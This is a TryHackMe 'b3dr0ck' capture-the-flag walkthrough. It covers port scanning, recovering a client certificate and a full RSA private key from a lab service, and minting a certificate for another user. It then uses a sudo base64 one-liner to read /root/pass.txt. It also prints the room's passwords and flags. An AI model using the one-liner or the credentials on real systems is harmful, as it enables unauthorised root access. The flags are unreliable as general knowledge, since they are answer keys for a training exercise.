Try Hack Me – b3dr0ck – b3dr0ck.v7
Enum

The website was forwarded from 80 to 4040.

-------------------------------------------
Welcome to ABC!
Abbadabba Broadcasting Compandy
We're in the process of building a website!
Can you believe this technology exists in bedrock?!?
Barney is helping to setup the server, and he said this info was important...
Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!?
Bamm Bamm tried to setup a sql database, but I don't see it running.
Looks like it started something else, but I'm not sure how to turn it off...
He said it was from the toilet and OVER 9000!
Need to try and secure connections with certificates...

Nmap

└─$ nmap 10.10.164.214 -sC -sV -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 06:27 PDT
Nmap scan report for 10.10.164.214
Host is up (0.16s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 1ac70071b665f582d824807248ad996e (RSA)
|   256 3ab5252eea2b44582455ef82cee0baeb (ECDSA)
|_  256 cf10028e96d324adae7dd15a0dc486ac (ED25519)
80/tcp    open  http         nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://10.10.164.214:4040/
|_http-server-header: nginx/1.18.0 (Ubuntu)
4040/tcp  open  ssl/yo-main?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Date: Mon, 27 Mar 2023 13:38:07 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Date: Mon, 27 Mar 2023 13:38:08 GMT
|     Connection: close
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2023-03-27T13:32:27
|_Not valid after:  2024-03-26T13:32:27
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
9009/tcp  open  pichat?
| fingerprint-strings:
|
|_    What are you looking for?
54321/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2023-03-27T13:32:27
|_Not valid after:  2024-03-26T13:32:27

After running nmap against all ports with the -p- flag I found 5 ports open: 22, 80, 4040, 9009 and 54321.

Opening a web browser to port 80 I noticed that it was being forwarded to port 4040, and I was greeted with the message quoted above. I inspected the web page and came up with nothing, so I figured I would check out port 9009. So I fired up nc.

nc 10.10.164.214 9009
Try connecting using: socat stdio ssl:MACHINE_IP:54321,cert=<CERT_FILE>,key=<KEY_FILE>,verify=0
What are you looking for? You use this service to recover your client certificate and private key
What are you looking for? client certificate
Sounds like you forgot your certificate. Let's find it for you.
-----BEGIN CERTIFICATE-----
MIICoTCCAYkCAgTSMA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yMzAzMjcxMzMyMjdaFw0yNDAzMjYxMzMyMjdaMBgxFjAUBgNVBAMMDUJh
cm5leSBSdWJibGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDIKEJu
npls8+98WiGi/oGe4cpNXqcUrLqGLRAcjQVDSt233t/ANZM8PW6x4lTzsLjGADfE
zOU+yBWNQkCSvs1a4azjnxYvV4jprtk8L27rK0coovNhgX4dCY9xVQC/LiTsnyxD
wPqxbv7QZ9YaqBeIS2kX+G5wxb51NV4X+CmTBC0N4R7dSSWwFDdFcuuvTG5ga+D2
QuR9EXpEhkoFRyyzFRwN8XLocUpifuAmPdw8Nz+hfQ17fo7+qIlr1/2HuTg2GcpE
aLRVsF5ry42ZWbh6a+aqHxuL+nXqwh+eUkVsz9zpYOUZ24UjnAbVPuPkZVuhQ7B8
tWo2wRSCDmNefOldAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAGO/bt4SH6unIl9U
nHJODeNZsULOynUGB45UmddXWLMZL8IA0SBe1Pr9SM9goQA4ZYJilLkjVCM5BWtd
91IY5BqsyTLxWnTniciuieMO/RNdShoWoUhEP+07rjDeDFwNdPp9bKIsp0FpPWAc
WqklKOwAtPuavADRJ8IzPHgk1tg1S2SlZbF6ka44g1sCC+38eVUUs9d4RWiGdtZE
SM6+droalTgOzvCqLck1YjUT9z53SPXWQI0+lywlsc3fEomNtPWTHBAYH88R56eF
Lz4IdizdU8eK+ZX8s3JAzwPNTXgNzY30mhuWhonWFJsabvOiHDIZBSuKHVzQssr3
Zcy7t/o=
-----END CERTIFICATE-----
What are you looking for?
What are you looking for? private key
Sounds like you forgot your private key. Let's find it for you...
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAyChCbp6ZbPPvfFohov6BnuHKTV6nFKy6hi0QHI0FQ0rdt97f
wDWTPD1useJU87C4xgA3xMzlPsgVjUJAkr7NWuGs458WL1eI6a7ZPC9u6ytHKKLz
YYF+HQmPcVUAvy4k7J8sQ8D6sW7+0GfWGqgXiEtpF/hucMW+dTVeF/gpkwQtDeEe
3UklsBQ3RXLrr0xuYGvg9kLkfRF6RIZKBUcssxUcDfFy6HFKYn7gJj3cPDc/oX0N
e36O/qiJa9f9h7k4NhnKRGi0VbBea8uNmVm4emvmqh8bi/p16sIfnlJFbM/c6WDl
GduFI5wG1T7j5GVboUOwfLVqNsEUgg5jXnzpXQIDAQABAoIBAAcc7ydxOXCWxqb7
qQBa3Q5hZcgUGgnxDXvhNBZfqJU4nuJ+6CKzhLT6Vem6alxypk5bCaBTy73MbH+l
oBfW8gNNy9AXAjnSeYocbZnm8aEn25KFH/MSIAI2KcPUSn+Ay00hZvhNbltJ34JW
flRaLuPoEicI7BvT2y3dJKfjaM7RogLsjlAA+gu2L9OrHRDwQxAdRrDc14JAAc8i
5hwZi2HGoUunbZ7npI5vDkX2CQN9Q+ry+I0zZnL9DZ4cHueWja1JwYKe+DYjkZHF
2Ih65wvcO2GzT3NrSeXMFRtlpQYdsW+4B93gUKxDN3w8i6+OJHiOTD9HAzVzR/6M
4ZkIu/0CgYEA+OljyyAdD9Dk+2ct9Usz3N3wc+cBvugKlKz0rwl+21wGnGj4bsiw
2xpqVfm6a6uaasd8ZQjYV5QbHZZzYYOtc44mHDwloL4QAbMEOt7ciGQGp+UJ+lFb
UwmsTvcnd+16Em0Tl8shYAhYH3hNSqkAuX49EOzSexEUeVWADpkV82cCgYEAzdtw
/YBbA+EjMY1EHL8uqW44SYpqGwUWR2dYwCLXbvuaarqMDoeYe83Inkl/fES8/ihG
10EU1TdimKmQdx1/J0Uyk0faH3OY63fhj14cEm+CPLBXgP9ne5LvdswEZRnpWcYd
pJfNikcihCq1JuffvTW8x556IOOrWSGwD0/c5psCgYEAo/ns2hXvz0mIb+5LIntG
UUyMaW5XghKPVd6S2vTgc1YurL+iWikwCUdfogAARYopEgsU8eJf02Ioctd4b1c1
3xhYFuWwzDIpjVUHhljm45sxn02Nwy/xf8SxlNvRTnpNnvHopGkXNZKJq0GveW3Y
olp9lDbPem+IE162G+fRxCUCgYEAzGmMIF21gvuri8fgC7+YISxOflAQnrYFcm/g
BCJU1GLI6hRFgSQKOV2VSgBntEk5dhMejR6WBkcSA8/UoUNMAP3Ig9FEehi6j48i
Ds//hhruMz9UFMcIxf+ZA9kAwDfjrH567vbCZf3O+3jBG1oCpQrYY0wtr70DZ+V4
wyulieMCgYEAzrYQhSmWpxE5AmVfb8ocLlfNMMZiYREP3GDvTVYljwRt8VLzEI48
L83AwrQ9nS4hVrSlJbtu63qgDyuEm4g5htyVi6AuzqAo4Q5Ik7ES/z04SqIcKCvf
v7QZEyEfsDqIRV0H1XqKL1uDIkyARdMo3bGbO/AXMRsijPW86jfqnE0=
-----END RSA PRIVATE KEY-----

Well, that was pretty easy. I copied the private key and the cert into two files and gave each a file name.
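Rather than copying the two blocks out by hand, the recovery can be scripted. The following is an added example, not part of the writeup or the room: a stdlib-only Python script that pulls every PEM block out of a captured transcript (even one whose line breaks were turned into spaces when it was pasted), parses the RSA private key far enough to read its modulus, and confirms that the certificate really embeds that same modulus before the pair is handed to socat. The transcript string is constructed here; the certificate and key bodies inside it are the ones shown above.

```python
import base64
import re

# Constructed capture of the port-9009 exchange. The certificate and key bodies
# are the ones the writeup received, laid out on 64-character lines.
TRANSCRIPT = """\
What are you looking for? client certificate
-----BEGIN CERTIFICATE-----
MIICoTCCAYkCAgTSMA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yMzAzMjcxMzMyMjdaFw0yNDAzMjYxMzMyMjdaMBgxFjAUBgNVBAMMDUJh
cm5leSBSdWJibGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDIKEJu
npls8+98WiGi/oGe4cpNXqcUrLqGLRAcjQVDSt233t/ANZM8PW6x4lTzsLjGADfE
zOU+yBWNQkCSvs1a4azjnxYvV4jprtk8L27rK0coovNhgX4dCY9xVQC/LiTsnyxD
wPqxbv7QZ9YaqBeIS2kX+G5wxb51NV4X+CmTBC0N4R7dSSWwFDdFcuuvTG5ga+D2
QuR9EXpEhkoFRyyzFRwN8XLocUpifuAmPdw8Nz+hfQ17fo7+qIlr1/2HuTg2GcpE
aLRVsF5ry42ZWbh6a+aqHxuL+nXqwh+eUkVsz9zpYOUZ24UjnAbVPuPkZVuhQ7B8
tWo2wRSCDmNefOldAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAGO/bt4SH6unIl9U
nHJODeNZsULOynUGB45UmddXWLMZL8IA0SBe1Pr9SM9goQA4ZYJilLkjVCM5BWtd
91IY5BqsyTLxWnTniciuieMO/RNdShoWoUhEP+07rjDeDFwNdPp9bKIsp0FpPWAc
WqklKOwAtPuavADRJ8IzPHgk1tg1S2SlZbF6ka44g1sCC+38eVUUs9d4RWiGdtZE
SM6+droalTgOzvCqLck1YjUT9z53SPXWQI0+lywlsc3fEomNtPWTHBAYH88R56eF
Lz4IdizdU8eK+ZX8s3JAzwPNTXgNzY30mhuWhonWFJsabvOiHDIZBSuKHVzQssr3
Zcy7t/o=
-----END CERTIFICATE-----
What are you looking for? private key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAyChCbp6ZbPPvfFohov6BnuHKTV6nFKy6hi0QHI0FQ0rdt97f
wDWTPD1useJU87C4xgA3xMzlPsgVjUJAkr7NWuGs458WL1eI6a7ZPC9u6ytHKKLz
YYF+HQmPcVUAvy4k7J8sQ8D6sW7+0GfWGqgXiEtpF/hucMW+dTVeF/gpkwQtDeEe
3UklsBQ3RXLrr0xuYGvg9kLkfRF6RIZKBUcssxUcDfFy6HFKYn7gJj3cPDc/oX0N
e36O/qiJa9f9h7k4NhnKRGi0VbBea8uNmVm4emvmqh8bi/p16sIfnlJFbM/c6WDl
GduFI5wG1T7j5GVboUOwfLVqNsEUgg5jXnzpXQIDAQABAoIBAAcc7ydxOXCWxqb7
qQBa3Q5hZcgUGgnxDXvhNBZfqJU4nuJ+6CKzhLT6Vem6alxypk5bCaBTy73MbH+l
oBfW8gNNy9AXAjnSeYocbZnm8aEn25KFH/MSIAI2KcPUSn+Ay00hZvhNbltJ34JW
flRaLuPoEicI7BvT2y3dJKfjaM7RogLsjlAA+gu2L9OrHRDwQxAdRrDc14JAAc8i
5hwZi2HGoUunbZ7npI5vDkX2CQN9Q+ry+I0zZnL9DZ4cHueWja1JwYKe+DYjkZHF
2Ih65wvcO2GzT3NrSeXMFRtlpQYdsW+4B93gUKxDN3w8i6+OJHiOTD9HAzVzR/6M
4ZkIu/0CgYEA+OljyyAdD9Dk+2ct9Usz3N3wc+cBvugKlKz0rwl+21wGnGj4bsiw
2xpqVfm6a6uaasd8ZQjYV5QbHZZzYYOtc44mHDwloL4QAbMEOt7ciGQGp+UJ+lFb
UwmsTvcnd+16Em0Tl8shYAhYH3hNSqkAuX49EOzSexEUeVWADpkV82cCgYEAzdtw
/YBbA+EjMY1EHL8uqW44SYpqGwUWR2dYwCLXbvuaarqMDoeYe83Inkl/fES8/ihG
10EU1TdimKmQdx1/J0Uyk0faH3OY63fhj14cEm+CPLBXgP9ne5LvdswEZRnpWcYd
pJfNikcihCq1JuffvTW8x556IOOrWSGwD0/c5psCgYEAo/ns2hXvz0mIb+5LIntG
UUyMaW5XghKPVd6S2vTgc1YurL+iWikwCUdfogAARYopEgsU8eJf02Ioctd4b1c1
3xhYFuWwzDIpjVUHhljm45sxn02Nwy/xf8SxlNvRTnpNnvHopGkXNZKJq0GveW3Y
olp9lDbPem+IE162G+fRxCUCgYEAzGmMIF21gvuri8fgC7+YISxOflAQnrYFcm/g
BCJU1GLI6hRFgSQKOV2VSgBntEk5dhMejR6WBkcSA8/UoUNMAP3Ig9FEehi6j48i
Ds//hhruMz9UFMcIxf+ZA9kAwDfjrH567vbCZf3O+3jBG1oCpQrYY0wtr70DZ+V4
wyulieMCgYEAzrYQhSmWpxE5AmVfb8ocLlfNMMZiYREP3GDvTVYljwRt8VLzEI48
L83AwrQ9nS4hVrSlJbtu63qgDyuEm4g5htyVi6AuzqAo4Q5Ik7ES/z04SqIcKCvf
v7QZEyEfsDqIRV0H1XqKL1uDIkyARdMo3bGbO/AXMRsijPW86jfqnE0=
-----END RSA PRIVATE KEY-----
"""

PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.DOTALL)


def extract_pem_blocks(text):
    """Map each PEM label to its DER bytes. Whitespace inside the body is dropped
    first, so a block pasted with its line breaks turned into spaces still decodes."""
    return {label: base64.b64decode(re.sub(r"\s+", "", body), validate=True)
            for label, body in PEM_BLOCK.findall(text)}


def _der_tlv(buf, pos):
    """Read one DER tag-length-value starting at pos -> (tag, value, end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length: low 7 bits give the byte count
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def rsa_key_params(key_der):
    """PKCS#1 RSAPrivateKey ::= SEQUENCE { version, modulus, publicExponent, ... }.
    Returns (modulus, exponent, modulus_tlv); modulus_tlv is the INTEGER as encoded."""
    tag, seq, _ = _der_tlv(key_der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _version, pos = _der_tlv(seq, 0)
    start = pos
    _, modulus, pos = _der_tlv(seq, pos)
    _, exponent, _ = _der_tlv(seq, pos)
    return int.from_bytes(modulus, "big"), int.from_bytes(exponent, "big"), seq[start:pos]


def key_matches_cert(key_der, cert_der):
    """DER is canonical, so the modulus INTEGER inside the certificate's
    SubjectPublicKeyInfo is byte-for-byte the one in the RSAPrivateKey."""
    return rsa_key_params(key_der)[2] in cert_der


def check_transcript(text):
    """Summarise what was recovered and whether the key really belongs to the cert."""
    blocks = extract_pem_blocks(text)
    modulus, exponent, _ = rsa_key_params(blocks["RSA PRIVATE KEY"])
    return {"labels": sorted(blocks), "modulus_bits": modulus.bit_length(),
            "exponent": exponent,
            "pair_matches": key_matches_cert(blocks["RSA PRIVATE KEY"], blocks["CERTIFICATE"])}
```

The substring check works because DER has exactly one encoding for a given INTEGER, so no X.509 parsing is needed to compare the public halves; a mismatch here means the service handed back a key for a different certificate and the socat handshake would fail.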
┌──(kali㉿kali)-[~/Desktop]
socat stdio ssl:10.10.164.214:54321,cert=cert,key=rsakey,verify=0
Welcome: 'Barney Rubble' is authorized.
b3dr0ck>
This service is for login and password hints
b3dr0ck> password
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')
b3dr0ck>
This is where I made a mistake. I got the password hint: d1ad7c0a3805955a35eb260dab4180dd. But I took that literally as a hint, so I made the assumption that it was a hash. After more time than I want to admit spent trying to figure out what was going on, I left for a few hours, came back, and figured I would try d1ad7c0a3805955a35eb260dab4180dd as the password for the barney user. Which worked. Not really much of a password hint if you ask me.
That is the first question done: THM{f05780f08f0eb1de65023069d0e4c90c}. Once I was logged in as barney I ran sudo -l, which is the first thing I always do.
Certutil bob barney.certificate.pem

Running this command makes a new cert for bob under barney.certificate.pem. Grab the cert and the private key just like before.

Connect back to port 54321 with the new cert and key you created:

socat stdio ssl:10.10.164.214:54321,cert=cert1,key=rsakey1,verify=0
Question two: YabbaDabbaD0000!
Once logged in as fred, grab the flag. Question 3: THM{08da34e619da839b154521da7323559d}
As usual with a new user, I ran sudo -l. After running it I went to my favourite site, GTFOBins, and checked base64.

Looks like I need to run the GTFOBins sudo one-liner against the root password file:

LFILE=/root/pass.txt; sudo base64 "$LFILE" | base64 --decode

This took a couple of minutes to figure out. I had a good feeling that it was base64 or base32. Was it both? I opened the CyberChef website and tried each of them on its own, then tried both together, Base32 and Base64.
And now we have the password for root: flintstonesvitamins

su root
flintstonesvitamins
There is our last flag Question 4: THM{de4043c009214b56279982bf10a661b7}